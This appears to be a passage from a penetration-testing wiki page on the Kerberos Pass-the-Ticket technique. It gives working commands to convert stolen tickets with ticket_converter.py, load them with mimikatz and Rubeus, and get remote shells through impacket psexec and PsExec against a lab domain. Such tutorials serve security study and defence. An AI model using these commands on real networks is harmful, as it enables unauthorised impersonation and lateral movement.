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This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.
The ticket_converter script. The only needed parameters are the current ticket and the output file, it automatically detects the input ticket file format and converts it. For example:
root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi
root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache
Kekeo, to convert them in Windows. This tool was not checked due to requiring a license in their ASN1 library, but I think it is worth mentioning.
{% code title="Linux" %}
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/[email protected] -k -no-pass
{% endcode %}
{% code title="Windows" %}
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe][email protected]"
.\Rubeus.exe ptt /ticket:[0;28419fe][email protected]
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd
{% endcode %}
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